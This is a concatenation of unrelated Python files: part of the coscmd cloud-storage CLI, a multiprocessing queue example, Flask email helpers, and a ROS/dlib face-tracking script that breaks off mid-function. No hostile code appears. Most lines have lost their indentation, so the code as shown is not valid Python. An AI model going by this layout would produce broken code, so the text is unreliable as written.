kwargs['force'] = args.force
kwargs['versions'] = args.versions
kwargs['versionId'] = args.versionId
kwargs['yes'] = args.yes
if args.recursive:
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path == '/':
args.cos_path = ''
if not Interface.delete_folder(args.cos_path, **kwargs):
logger.debug("delete all files under {cos_path} successfully!".format(cos_path=to_printable_str(args.cos_path)))
return 0
else:
logger.debug("delete all files under {cos_path} failed!".format(cos_path=to_printable_str(args.cos_path)))
return -1
else:
if args.cos_path == '':
logger.warn("not support delete empty path")
return -1
if not Interface.delete_file(args.cos_path, **kwargs):
logger.debug("delete all files under {cos_path} successfully!".format(cos_path=to_printable_str(args.cos_path)))
return 0
else:
logger.debug("delete all files under {cos_path} failed!".format(cos_path=to_printable_str(args.cos_path)))
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def copy(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
_, args.cos_path = concat_path(args.source_path, args.cos_path)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args.source_path, text_type):
args.source_path = args.source_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
kwargs['sync'] = args.sync
kwargs['force'] = args.force
kwargs['directive'] = args.directive
kwargs['skipmd5'] = args.skipmd5
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['delete'] = args.delete
kwargs['yes'] = args.yes
kwargs['move'] = False
if args.recursive:
_, args.cos_path = concat_path(args.source_path, args.cos_path)
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not Interface.copy_folder(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return 1
else:
if not Interface.copy_file(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def move(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
_, args.cos_path = concat_path(args.source_path, args.cos_path)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not isinstance(args.source_path, text_type):
args.source_path = args.source_path.decode(fs_coding)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
kwargs = {}
kwargs['sync'] = False
kwargs['force'] = True
kwargs['directive'] = args.directive
kwargs['skipmd5'] = True
kwargs['ignore'] = args.ignore.split(',')
kwargs['include'] = args.include.split(',')
kwargs['delete'] = False
kwargs['move'] = True
if args.recursive:
_, args.cos_path = concat_path(args.source_path, args.cos_path)
if args.cos_path.endswith('/') is False:
args.cos_path += '/'
if args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
if not Interface.copy_folder(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return 1
else:
if not Interface.copy_file(args.source_path, args.cos_path, args.headers, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def list(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
kwargs = {}
kwargs['recursive'] = args.recursive
kwargs['all'] = args.all
kwargs['num'] = args.num
kwargs['human'] = args.human
kwargs['versions'] = args.versions
if not Interface.list_objects(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def list_parts(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if Interface.list_multipart_uploads(cos_path=args.cos_path):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def abort(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
if not Interface.abort_parts(cos_path=args.cos_path):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def info(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
if not Interface.info_object(args.cos_path, _human=args.human):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def restore(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
kwargs = {}
kwargs['day'] = args.day
kwargs['tier'] = args.tier
if args.recursive:
if not Interface.restore_folder(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
else:
if not Interface.restore_file(cos_path=args.cos_path, **kwargs):
return 0
else:
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def signurl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
try:
Interface = client.op_int()
rt = Interface.sign_url(args.cos_path, args.timeout)
if rt:
return 0
else:
return -1
except Exception:
logger.warn('Geturl fail')
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_object_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
rt = Interface.put_object_acl(args.grant_read, args.grant_write, args.grant_full_control, args.cos_path)
if rt is True:
return 0
else:
logger.warn("Put object acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_object_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
while args.cos_path.startswith('/'):
args.cos_path = args.cos_path[1:]
            if not isinstance(args.cos_path, text_type):
args.cos_path = args.cos_path.decode(fs_coding)
Interface = client.op_int()
rt = Interface.get_object_acl(args.cos_path)
if rt is True:
return 0
else:
logger.warn("Get object acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def create_bucket(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
if Interface.create_bucket():
return 0
else:
logger.warn("Create bucket fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def delete_bucket(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
kwargs = {}
kwargs['force'] = args.force
if Interface.delete_bucket(**kwargs):
return 0
else:
logger.warn("Delete bucket fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_bucket_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.put_bucket_acl(args.grant_read, args.grant_write, args.grant_full_control)
if rt is True:
return 0
else:
logger.warn("put bucket acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_bucket_acl(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.get_bucket_acl()
if rt is True:
return 0
else:
logger.warn("Get bucket acl fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def put_bucket_versioning(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.put_bucket_versioning(args.status)
if rt is True:
return 0
else:
logger.warn("Put bucket versioning fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def get_bucket_versioning(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
rt = Interface.get_bucket_versioning()
if rt is True:
return 0
else:
logger.warn("Get bucket versioning fail")
return -1
except Exception as e:
logger.warn(e)
return -2
@staticmethod
def probe(args):
try:
conf = load_conf()
client = CosS3Client(conf)
Interface = client.op_int()
kwargs = {}
kwargs['test_num'] = args.num
kwargs['file_size'] = args.size
rt = Interface.probe(**kwargs)
if 0 == rt:
return 0
else:
logger.warn("probe failed")
return -1
except Exception as e:
logger.warn(e)
return -2
def get_version():
logger.info(Version)
return 0
def version_check():
try:
ret = requests.get("https://pypi.org/pypi/coscmd/json").content
res_json = json.loads(ret)
latest_version = res_json["info"]["version"]
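        # Compare the version components numerically; comparing the raw strings would
        # mis-order releases once a component reaches two digits (e.g. '10' < '9').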
        lat_spl = [int(x) for x in latest_version.split('.')]
        cur_spl = [int(x) for x in cos_global.Version.split('.')]
        if cur_spl < lat_spl:
logger.info("The current version of coscmd is {v1} \
and the latest version is {v2}. It is recommended \
to upgrade coscmd with the command 'pip install coscmd -U'.".format(v1=cos_global.Version, v2=latest_version))
except Exception as e:
logger.debug(e)
def command_thread():
global res
res = -1
desc = """an easy-to-use but powerful command-line tool.
    try \'coscmd -h\' to get more information.
    try \'coscmd sub-command -h\' to learn all command usage, like \'coscmd upload -h\'"""
parser = ArgumentParser(description=desc)
parser.add_argument('-d', '--debug', help="Debug mode", action="store_true", default=False)
parser.add_argument('-s', '--silence', help="Silence mode", action="store_true", default=False)
parser.add_argument('-b', '--bucket', help="Specify bucket", type=str, default="")
parser.add_argument('-r', '--region', help="Specify region", type=str, default="")
parser.add_argument('-c', '--config_path', help="Specify config_path", type=str, default="~/.cos.conf")
parser.add_argument('-l', '--log_path', help="Specify log_path", type=str, default="~/.cos.log")
    parser.add_argument('--log_size', help='specify max log size in MB (default 128MB)', type=int, default=128)
parser.add_argument('--log_backup_count', help='specify log backup num', type=int, default=1)
sub_parser = parser.add_subparsers()
parser_config = sub_parser.add_parser("config", help="Config your information at first")
parser_config.add_argument('-a', '--secret_id', help='Specify your secret id', type=str, required=True)
parser_config.add_argument('-s', '--secret_key', help='Specify your secret key', type=str, required=True)
parser_config.add_argument('-t', '--token', help='Set x-cos-security-token header', type=str, default="")
parser_config.add_argument('-b', '--bucket', help='Specify your bucket', type=str, required=True)
group = parser_config.add_mutually_exclusive_group(required=True)
group.add_argument('-r', '--region', help='Specify your region', type=str)
group.add_argument('-e', '--endpoint', help='Specify COS endpoint', type=str)
parser_config.add_argument('-m', '--max_thread', help='Specify the number of threads (default 5)', type=int, default=5)
parser_config.add_argument('-p', '--part_size', help='specify min part size in MB (default 1MB)', type=int, default=1)
parser_config.add_argument('--retry', help='specify retry times', type=int, default=5)
parser_config.add_argument('--timeout', help='specify request timeout', type=int, default=60)
parser_config.add_argument('-u', '--appid', help='Specify your appid', type=str, default="")
parser_config.add_argument('--verify', help='Specify your encryption method', type=str, default="md5")
parser_config.add_argument('--do-not-use-ssl', help="Use http://", action="store_true", default=False, dest="use_http")
parser_config.add_argument('--anonymous', help="Anonymous operation", action="store_true", default=False, dest="anonymous")
parser_config.set_defaults(func=config)
parser_upload = sub_parser.add_parser("upload", help="Upload file or directory to COS")
parser_upload.add_argument('local_path', help="Local file path as /tmp/a.txt or directory", type=str)
parser_upload.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
    parser_upload.add_argument('-r', '--recursive', help="Upload recursively when uploading a directory", action="store_true", default=False)
parser_upload.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_upload.add_argument('-s', '--sync', help="Upload and skip the same file", action="store_true", default=False)
parser_upload.add_argument('-f', '--force', help="upload without history breakpoint", action="store_true", default=False)
parser_upload.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
parser_upload.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_upload.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_upload.add_argument('--skipmd5', help='Upload without x-cos-meta-md5 / sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_upload.add_argument('--delete', help="delete objects which exists in cos but not exist in local", action="store_true", default=False)
parser_upload.set_defaults(func=Op.upload)
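    # Illustrative invocations built from the options above (paths and COS keys are
    # placeholders, not examples shipped with the tool):
    #   coscmd upload /tmp/a.txt a/b.txt
    #   coscmd upload -rs --ignore "*.tmp" ./build/ remote/build/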
parser_download = sub_parser.add_parser("download", help="Download file from COS to local")
parser_download.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_download.add_argument('local_path', help="Local file path as /tmp/a.txt", type=str)
parser_download.add_argument('-f', '--force', help="Overwrite the saved files", action="store_true", default=False)
parser_download.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
    parser_download.add_argument('-r', '--recursive', help="Download recursively when downloading a directory", action="store_true", default=False)
parser_download.add_argument('-s', '--sync', help="Download and skip the same file", action="store_true", default=False)
parser_download.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_download.add_argument('--versionId', help='Specify versionId of object to list', type=str, default="")
parser_download.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_download.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_download.add_argument('--skipmd5', help='Download sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_download.add_argument('--delete', help="delete objects which exists in local but not exist in cos", action="store_true", default=False)
parser_download.add_argument('-n', '--num', help='Specify max part_num of multidownload', type=int, default=10)
parser_download.set_defaults(func=Op.download)
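    # Illustrative invocations (placeholder paths and COS keys):
    #   coscmd download a/b.txt /tmp/a.txt
    #   coscmd download -rs remote/build/ ./build/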
parser_delete = sub_parser.add_parser("delete", help="Delete file or files on COS")
parser_delete.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_delete.add_argument('-r', '--recursive', help="Delete files recursively, WARN: all files with the prefix will be deleted!", action="store_true", default=False)
parser_delete.add_argument('--versions', help='Delete objects with versions', action="store_true", default=False)
parser_delete.add_argument('--versionId', help='Specify versionId of object to list', type=str, default="")
parser_delete.add_argument('-f', '--force', help="Delete directly without confirmation", action="store_true", default=False)
parser_delete.add_argument('-y', '--yes', help="Delete directly without confirmation", action="store_true", default=False)
parser_delete.set_defaults(func=Op.delete)
parser_abort = sub_parser.add_parser("abort", help='Aborts upload parts on COS')
parser_abort.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_abort.set_defaults(func=Op.abort)
parser_copy = sub_parser.add_parser("copy", help="Copy file from COS to COS")
parser_copy.add_argument('source_path', help="Source file path as 'bucket-appid.cos.ap-guangzhou.myqcloud.com/a.txt'", type=str)
parser_copy.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_copy.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
    parser_copy.add_argument('-d', '--directive', help="Whether to overwrite metadata headers: 'Copy' keeps the source headers, 'Replaced' uses the new ones", type=str, choices=['Copy', 'Replaced'], default="Copy")
parser_copy.add_argument('-s', '--sync', help="Copy and skip the same file", action="store_true", default=False)
parser_copy.add_argument('-r', '--recursive', help="Copy files recursively", action="store_true", default=False)
parser_copy.add_argument('-f', '--force', help="Overwrite file without skip", action="store_true", default=False)
parser_copy.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
parser_copy.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_copy.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_copy.add_argument('--skipmd5', help='Copy sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_copy.add_argument('--delete', help="delete objects which exists in sourcepath but not exist in dstpath", action="store_true", default=False)
parser_copy.set_defaults(func=Op.copy)
parser_move = sub_parser.add_parser("move", help="move file from COS to COS")
parser_move.add_argument('source_path', help="Source file path as 'bucket-appid.cos.ap-guangzhou.myqcloud.com/a.txt'", type=str)
parser_move.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_move.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
    parser_move.add_argument('-d', '--directive', help="Whether to overwrite metadata headers: 'Copy' keeps the source headers, 'Replaced' uses the new ones", type=str, choices=['Copy', 'Replaced'], default="Copy")
parser_move.add_argument('-r', '--recursive', help="Copy files recursively", action="store_true", default=False)
parser_move.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_move.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_move.set_defaults(func=Op.move)
parser_list = sub_parser.add_parser("list", help='List files on COS')
parser_list.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_list.add_argument('-a', '--all', help="List all the files", action="store_true", default=False)
parser_list.add_argument('-r', '--recursive', help="List files recursively", action="store_true", default=False)
parser_list.add_argument('-n', '--num', help='Specify max num of files to list', type=int, default=100)
parser_list.add_argument('-v', '--versions', help='List object with versions', action="store_true", default=False)
parser_list.add_argument('--human', help='Humanized display', action="store_true", default=False)
parser_list.set_defaults(func=Op.list)
parser_list_parts = sub_parser.add_parser("listparts", help="List upload parts")
parser_list_parts.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_list_parts.set_defaults(func=Op.list_parts)
parser_info = sub_parser.add_parser("info", help="Get the information of file on COS")
parser_info.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_info.add_argument('--human', help='Humanized display', action="store_true", default=False)
parser_info.set_defaults(func=Op.info)
parser_restore = sub_parser.add_parser("restore", help="Restore")
parser_restore.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_restore.add_argument('-r', '--recursive', help="Restore files recursively", action="store_true", default=False)
parser_restore.add_argument('-d', '--day', help='Specify lifetime of the restored (active) copy', type=int, default=7)
parser_restore.add_argument('-t', '--tier', help='Specify the data access tier', type=str, choices=['Expedited', 'Standard', 'Bulk'], default='Standard')
parser_restore.set_defaults(func=Op.restore)
parser_signurl = sub_parser.add_parser("signurl", help="Get download url")
parser_signurl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_signurl.add_argument('-t', '--timeout', help='Specify the signature valid time', type=int, default=10000)
parser_signurl.set_defaults(func=Op.signurl)
parser_create_bucket = sub_parser.add_parser("createbucket", help='Create bucket')
parser_create_bucket.set_defaults(func=Op.create_bucket)
parser_delete_bucket = sub_parser.add_parser("deletebucket", help='Delete bucket')
parser_delete_bucket.add_argument('-f', '--force', help="Clear all inside the bucket and delete bucket", action="store_true", default=False)
parser_delete_bucket.set_defaults(func=Op.delete_bucket)
parser_put_object_acl = sub_parser.add_parser("putobjectacl", help='''Set object acl''')
parser_put_object_acl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_put_object_acl.add_argument('--grant-read', dest='grant_read', help='Set grant-read', type=str, required=False)
parser_put_object_acl.add_argument('--grant-write', dest='grant_write', help='Set grant-write', type=str, required=False)
parser_put_object_acl.add_argument('--grant-full-control', dest='grant_full_control', help='Set grant-full-control', type=str, required=False)
parser_put_object_acl.set_defaults(func=Op.put_object_acl)
parser_get_object_acl = sub_parser.add_parser("getobjectacl", help='Get object acl')
parser_get_object_acl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_get_object_acl.set_defaults(func=Op.get_object_acl)
parser_put_bucket_acl = sub_parser.add_parser("putbucketacl", help='''Set bucket acl''')
parser_put_bucket_acl.add_argument('--grant-read', dest='grant_read', help='Set grant-read', type=str, required=False)
parser_put_bucket_acl.add_argument('--grant-write', dest='grant_write', help='Set grant-write', type=str, required=False)
parser_put_bucket_acl.add_argument('--grant-full-control', dest='grant_full_control', help='Set grant-full-control', type=str, required=False)
parser_put_bucket_acl.set_defaults(func=Op.put_bucket_acl)
parser_get_bucket_acl = sub_parser.add_parser("getbucketacl", help='Get bucket acl')
parser_get_bucket_acl.set_defaults(func=Op.get_bucket_acl)
parser_put_bucket_versioning = sub_parser.add_parser("putbucketversioning", help="Set the versioning state")
parser_put_bucket_versioning.add_argument("status", help="Status as a/b.txt", type=str, choices=['Enabled', 'Suspended'], default='Enable')
parser_put_bucket_versioning.set_defaults(func=Op.put_bucket_versioning)
parser_get_bucket_versioning = sub_parser.add_parser("getbucketversioning", help="Get the versioning state")
parser_get_bucket_versioning.set_defaults(func=Op.get_bucket_versioning)
parser_probe = sub_parser.add_parser("probe", help="Connection test")
parser_probe.add_argument('-n', '--num', help='Specify test times', type=int, default=3)
parser_probe.add_argument('-s', '--size', help='Specify test filesize(unit MB)', type=int, default=1)
parser_probe.set_defaults(func=Op.probe)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + Version)
args = parser.parse_args()
logger = logging.getLogger('coscmd')
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger_qcloud_cos = logging.getLogger('qcloud_cos')
logger_qcloud_cos.setLevel(logging.WARN)
if args.debug:
logger.setLevel(logging.DEBUG)
console.setLevel(logging.DEBUG)
logger_qcloud_cos.setLevel(logging.DEBUG)
if args.silence:
logger.setLevel(logging.FATAL)
logger_qcloud_cos.setLevel(logging.FATAL)
console.setLevel(logging.INFO)
handler = RotatingFileHandler(os.path.expanduser(args.log_path), maxBytes=args.log_size*1024*1024, backupCount=args.log_backup_count)
handler.setFormatter(logging.Formatter('%(asctime)s - [%(levelname)s]: %(message)s'))
logger.addHandler(handler)
logger_qcloud_cos.addHandler(handler)
logger.addHandler(console)
logger_qcloud_cos.addHandler(console)
global pre_appid, pre_bucket, pre_region, config_path, silence
config_path = args.config_path
pre_bucket = args.bucket
pre_region = args.region
silence = args.silence
try:
pre_appid = pre_bucket.split('-')[-1]
pre_bucket = pre_bucket.rstrip(pre_appid)
pre_bucket = pre_bucket[:-1]
except Exception:
logger.warn("set bucket error")
try:
res = args.func(args)
return res
except Exception:
return 0
def main_thread():
    thread_ = Thread(target=command_thread)
    thread_.start()
    import time
    try:
        while True:
            time.sleep(1)
            if thread_.is_alive() is False:
                break
    except KeyboardInterrupt:
        # threading.Thread has no stop() method; just exit this watcher thread and
        # let the interpreter tear the worker down.
        sys.exit()
def _main():
thread_ = Thread(target=main_thread)
thread_.daemon = True
thread_.start()
try:
while thread_.is_alive():
thread_.join(2)
except KeyboardInterrupt:
logger.info('exiting')
return 1
global res
return res
if __name__ == '__main__':
_main()
global res
sys.exit(res)
|
process_communication.py
|
# -*- coding: UTF8 -*-
# !/usr/bin/env python
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the writer process:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# Code executed by the reader process:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
    # The parent process creates the Queue and passes it to both child processes:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
    # Start the writer child process pw:
pw.start()
    # Start the reader child process pr:
pr.start()
    # Wait for pw to finish:
pw.join()
    # pr runs an infinite loop and can never be joined, so terminate it forcibly:
pr.terminate()
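    # Expected behaviour: the writer puts 'A', 'B', 'C' into the queue with random
    # pauses while the reader prints each value as it arrives; pr loops forever, so
    # it is terminated instead of joined.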
|
emails.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
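    # Render both the plain-text and HTML bodies, then hand the message to a worker
    # thread so the web request is not blocked while the SMTP transaction runs.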
message = Message(current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
print(message.html, message.body)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
def send_invite_email(patient_user, token, to, doctor_name):
send_mail(subject='Invitation', to=to, template='emails/invite_email', user=patient_user,
token=token, doctor_name=doctor_name)
|
vision_dlib.py
|
#!/usr/bin/env python
import json
from threading import Thread
from imutils import face_utils
import numpy as np
import cv2
from skimage import measure
from scipy import ndimage
import dlib
import rospkg
import rospy
import roslib.packages
from std_msgs.msg import String
import tf
"""Detect motion and publish point of interest to tf
"""
SET_DRAW_DENSITY = 1
SET_THINNING = 6
SET_EXPAND = 300
ROS_PATH = roslib.packages.get_pkg_dir('akagachi_demo')
CV2_PATH = "/usr/local/lib/python3.6/dist-packages/cv2/data/"
FACE_CASCADE_PATH = CV2_PATH + '/haarcascade_frontalface_alt2.xml'
PROFILE_FACE_CASCADE_PATH = CV2_PATH + '/haarcascade_profileface.xml'
EYE_CASCADE_PATH = CV2_PATH + '/haarcascade_eye.xml'
DLIB_FACE_LMS_PREDICTER_PATH = ROS_PATH + '/../face_model/shape_predictor_68_face_landmarks.dat'
try:
dlib_face_landmarks_predictor = dlib.shape_predictor(DLIB_FACE_LMS_PREDICTER_PATH)
face_cascade = cv2.CascadeClassifier(FACE_CASCADE_PATH)
PROFILE_FACE_CASCADE = cv2.CascadeClassifier(PROFILE_FACE_CASCADE_PATH)
eye_cascade = cv2.CascadeClassifier(EYE_CASCADE_PATH)
except IOError:
    print('Face landmark data is missing! Go to the face_model folder and run the shell script there.')
class DlibFaceDetector:
'''
    Detect faces using dlib
'''
def __init__(self, compress=0.3):
self.compress = compress
self.prev = None
self.pre_pos = np.zeros(2)
def dlib_detect(self, image):
'''
        Detect a face and return the point between the eyes.
        parameters:
        - image: the current camera frame (BGR image).
        returns:
        - overlayedImage: a copy of the input with the detected face rectangle and the focus point drawn on it.
        - center_pos: the point to focus on; the previous point is reused when no face or eye centers are found (None only on the very first call).
'''
detector = dlib.get_frontal_face_detector()
center_pos = (0,0)
target_face = dlib.rectangle(300, 300, 1000, 1000)
#Image handling
overlayedImage = image.copy()
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#gray_image = cv2.resize(gray_image, (0, 0), fx=self.compress,
# fy=self.compress, interpolation=cv2.INTER_AREA)
if self.prev is None:
# on the first call to the function. self.prev saves previous image for comparison.
self.prev = image
return overlayedImage, None
#For speeding up, cascade detect faces.
faces = face_cascade.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=3, minSize=(100, 100))
if len(faces) < 1:
faces = PROFILE_FACE_CASCADE.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=3, minSize=(100, 100))
# target face is just one
if len(faces) == 1:
x, y, w, h = faces[0, :]
cv2.rectangle(overlayedImage, (x, y), (x + w, y + h), (255, 0, 0), 2)
            # trim the face region that the cascade detected
face = dlib.rectangle(x, y, x + w, y + h)
face_img = image[y: y + h, x: x + w]
face_parts = dlib_face_landmarks_predictor(image, face).parts()
center_pos = self.get_middle_eyes(image, face_parts)
# if you need the LMS, use here
#for i in face_parts:
# cv2.circle(overlayedImage, (i.x, i.y), 3, (255, 0, 0), -1)
if center_pos is not None:
cv2.circle(overlayedImage, center_pos, 5, (36, 74, 247), -1)
self.pre_pos = center_pos
else:
center_pos = self.pre_pos
else :
center_pos = self.pre_pos
return overlayedImage, center_pos
def eye_point(self, img, parts, left=True):
'''
        calculate the center of the eye image
parameters:
- img : camera raw image
- parts : the face landmarks from Dlib
- L or R : Left is True, Right is False
return
- eye_point_center : center point of the eye image
'''
if left:
eyes = [
parts[36],
min(parts[37], parts[38], key=lambda x: x.y),
max(parts[40], parts[41], key=lambda x: x.y),
parts[39],
]
else:
eyes = [
parts[42],
min(parts[43], parts[44], key=lambda x: x.y),
max(parts[46], parts[47], key=lambda x: x.y),
parts[45],
]
org_x = eyes[0].x
org_y = eyes[1].y
# for blinking, under development
#if self.is_close(org_y, eyes[2].y):
# return None
eye = img[org_y:eyes[2].y, org_x:eyes[-1].x]
_, eye = cv2.threshold(cv2.cvtColor(eye, cv2.COLOR_RGB2GRAY), 30, 255, cv2.THRESH_BINARY_INV)
eye_point_center = self.get_center(eye)
if eye_point_center is not None:
return eye_point_center[0] + org_x, eye_point_center[1] + org_y
return eye_point_center
def get_middle_eyes(self, img, parts):
'''
        calculate the point between the two eyes.
'''
center_posl = self.eye_point(img, parts, True)
center_posr = self.eye_point(img, parts, False)
if (center_posl is None) or (center_posr is None):
return None
        center_pos = ((center_posl[0] + center_posr[0]) // 2, (center_posl[1] + center_posr[1]) // 2)  # integer pixel coordinates for cv2.circle
return center_pos
def get_center(self, gray_img):
'''
        calculate the center of the input image.
'''
moments = cv2.moments(gray_img, False)
try:
return int(moments['m10'] / moments['m00']), int(moments['m01'] / moments['m00'])
except:
return None
def is_close(self, y0, y1):
'''
detect the closing eye
'''
if abs(y0 - y1) < 10:
return True
return False
def imgPoint_to_space_point(imgPoint, inv_proj, dist=1):
'''
convert point in 2d image to point in 3d space
'''
imgPoint = np.array([imgPoint[0], imgPoint[1], 1.0])
space_point = np.dot(inv_proj, imgPoint)
space_point *= dist
return (space_point[2], -space_point[0], -space_point[1])
def cameraLoop(c_width, c_height):
'''
thread to process frame retrieval.
By executing the I/O process on another thread, the whole process can be sped up.
